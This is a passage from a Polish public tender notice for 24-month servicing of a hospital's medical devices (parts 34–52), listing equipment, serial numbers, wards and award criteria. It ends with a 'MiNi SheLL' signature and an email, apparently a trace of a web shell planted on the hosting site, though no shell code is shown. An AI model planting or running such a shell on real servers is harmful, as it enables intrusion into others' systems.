13. APARAT DO HEMIODIALIZY AK 95S sn29572
14. APARAT DO HEMIODIALIZY AK 200S sn19360
15. APARAT DO HEMIODIALIZY AK 95S sn29573
16. APARAT DO HEMIODIALIZY AK 95S sn 29573
17. APARAT DO HEMIODIALIZY AK 200 U sn828
18. APARAT DO HEMIODIALIZY AK 200S sn 19359
19. APARAT DO HEMIODIALIZY AK 95 sn 5786
20. APARAT DO HEMIODIALIZY AK 96 sn 1935
21. APARAT DO HEMIODIALIZY AK 96 sn 1936
22. APARAT DO HEMIODIALIZY AK 200S sn25298
23. APARAT DO HEMIODIALIZY AK 200S sn25299.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 34 <b>NAZWA:</b> Zadanie nr 34.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 34
1. APARAT  DO  OPERACJI ZAĆMY INFINITI ODDZ.OKULISTYCZNY
sn 0801861301X.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 35 <b>NAZWA:</b> Zadanie nr 35.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 35
1. APARAT DO HEMIODIALIZY DIALOG+EVOLUTION  SN 200395  STACJA DIALIZ
2. APARAT DO HEMIODIALIZY DIALOG+EVOLUTION  SN 200713 STACJA DIALIZ
3. APARAT DO HEMIODIALIZY DIALOG+EVOLUTION  SN 200712  STACJA DIALIZ
4. APARAT DO HEMIODIALIZY DIALOG+EVOLUTION  SN 200714 STACJA DIALIZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 36 <b>NAZWA:</b> Zadanie nr 36.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 36
1. AUDIOMETR  PRZESIEWOWY  ST 20 sn 5832250 PORADNIA LARYNGOLOGICZNA.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 37 <b>NAZWA:</b> Zadanie nr 37.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 37
1. APARAT RTG   SWING  SN 1974  PRACOWNIA RTG KOWARY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 38 <b>NAZWA:</b> Zadanie nr 38.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 38
1. STRZYKAWKA  AUTOMATYCZNA OPTISTAR ELITE SN CIO810D00P  PRAC. MR
2. STRZYKAWKA AUTOMATYCZNA ANGIOMAT ILLUMENA  SN CI1008C012  PRAC. HEMODYNAMIKI
3. STRZYKAWKA AUTOMATYCZNA  OPTI VENTAGE  SN CI1110B508  PRAC. TK.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 39 <b>NAZWA:</b> Zadanie nr 39.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 39
1. NOSOLARYNGOSKOP  ER 270FP 2Y114A064 ODDZ.LARYNGOLOGICZNY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 40 <b>NAZWA:</b> Zadanie nr 40.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 40
1. LITHOTRYPTOR ULTRADZWIĘKOWY 1100143099 ODDZ. UROLOGICZNY.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 41 <b>NAZWA:</b> Zadanie nr 41.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 41
1. STERYLIZATOR PLAZMOWY STERRAD 100S  973705 CENTRALNA STERYLIZATORNIA.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 42 <b>NAZWA:</b> Zadanie nr 42.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 42
1. DEFIBRYLATOR LIFEPAK 12 12029615 BLOK OPERACYJNY
2. DEFIBRYLATOR LIFEPAK 12 12029818 ODDZ.KARDIOLOGICZNY
3. DEFIBRYLATOR LIFEPAK 12 1202916 ODDZ.NEO
4. DEFIBRYLATOR LIFEPAK 12 13008569 ODDZ.KARDIO
5. DEFIBRYLATOR LIFEPAK 12 12029817 OAiIT
6. DEFIBRYLATOR LIFEPAK 12 12008517 PRAC.KARDIOLOGII INTERWENCYJNEJ
7. DEFIBRYLATOR LIFEPAK 12 12177590 SOR
8. DEFIBRYLATOR LIFEPAK 12 34039405 SOR
9. DEFIBRYLATOR LIFEPAK 10 00036698 ODDZ.WEWNETRZNY
10. DEFIBRYLATOR LIFEPAK 9B 10693 STACJA DIALIZ
11. DEFIBRYLATOR LIFEPAK 20 34935472SOR
12. DEFIBRYLATOR LIFEPAK 500 12006934 ODDZ.GERIATRYCZNY
13. DEFIBRYLATOR LIFEPAK 500 12177999 ODDZ.NEUROLOGICZNY
14. DEFIBRYLATOR LIFEPAK 500 12006939 ODDZ. UROLOGICZNY
15. DEFIBRYLATOR LIFEPAK 500 12006933 ODDZ.CHIR.ONKOLOGICZNEJ
16. DEFIBRYLATOR LIFEPAK 500 12006936OAIIT
17. DEFIBRYLATOR LIFEPAK 500 12006935 SOR
18. DEFIBRYLATOR LIFEPAK 500 12006937 SALA  CES. CIĘĆ
19. DEFIBRYLATOR LIFEPAK 9P 9420 PORADNIA KARDIOL.
20. DEFIBRYLATOR LIFEPAK 9P ODDZ. PULMONOLOGICZNY  KOWARY
21. DEFIBRYLATOR LIFEPAK 15 SN 40573880  BLOK OPERACYJNY
22. DEFIBRYLATOR DEFIGARD 4000  SN 108990101402  ODDZ. KARDIOLOGII.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 43 <b>NAZWA:</b> Zadanie nr 43.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 43
1. PROCESOR TKANKOWY ASP 300S SN 3077/01.2009  PRACOWNIA PATOMORFOLOGII.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 44 <b>NAZWA:</b> Zadanie nr 44.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 44
1. WYWOŁYWARKA KODAK PROCESOR 102  SN 0304-0878 PRAC. RTG W KOWARACH.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 45 <b>NAZWA:</b> Zadanie nr 45.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 45
1. CYFROWY SYSTEM ZAPISU ZDJĘĆ
2. SYSTEM OBROBKI CYFROWEJ SKANER PŁYT CYFROWYCH.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 46 <b>NAZWA:</b> Zadanie nr 46.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 46
1. APARAT USG MYLAB SEVEV  SN 169  ODDZ. GERIATRII
2. APARAT USG SPARQ SN 71310218  ODDZ. WEWNĘTRZNY  9 przegląd 2017).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 47 <b>NAZWA:</b> Zadanie nr 47.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 47
1. APARAT USG FLEX FOCUS 400   SN 5003826  ODDZ. UROLOGII.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 48 <b>NAZWA:</b> Zadanie nr 48.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 48
1. APARAT USG ALOKA PROSOUND ALFA 5  (EBUS)    SN MO3449  PRAC. BRONCHOSKOPII.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 49 <b>NAZWA:</b> Zadanie nr 49.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 49
1. APARAT USG  HD 11 XE    SN US21077303  DIAGNOSTYKA OBRAZOWA
2. APARAT HD 15 SN US51220283 ODDZ. CHIRURGII NACZYNIOWEJ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 50 <b>NAZWA:</b> Zadanie nr 50.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 50
1. KABINA PLETYZMOGRAFICZNA ELITE DL  SN 211000279 DDZ. CHORÓB PŁUC
2. ULTIMA CPX SN 218000823 Z PRZYSTAWKĄ HR  ODDZ. CHORÓB PŁUC
3. BIEŻNIA TMX 4255  SN FV7442  ODDZ. CHORÓB PŁUC
4. SPIROMETR CPFS/D USB  N 220000752 Z POMPĄ KALIBRACYJNĄ  POR.CHORÓB PŁUC
5. SPIROMETR CPFS/D USB  SN 220001524 Z POMPĄ KALIBRACYJNĄ  POR.CHORÓB PŁUC
6. SPIROMETR CPFS/D USB  SN 220000534  ODDZ. CHORÓB PŁUC
7. POLISOMNOGRAF  PORTI 6 SN 92612080447.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 51 <b>NAZWA:</b> Zadanie nr 51.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 51
1. MONITOR  PRZEZSKÓRNY P/O2/PCO2  TCM COMBI-M  SN RO199N007  ODDZ. NEONATOLOGII.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 52 <b>NAZWA:</b> Zadanie nr 52.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 52
1. INKUBATOR ZAMKNIĘTY GIRAFFE SN HDHM51064  ODDZ. NEONATOLOGII.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.40.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Termin rozpatrzenia reklamacji - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com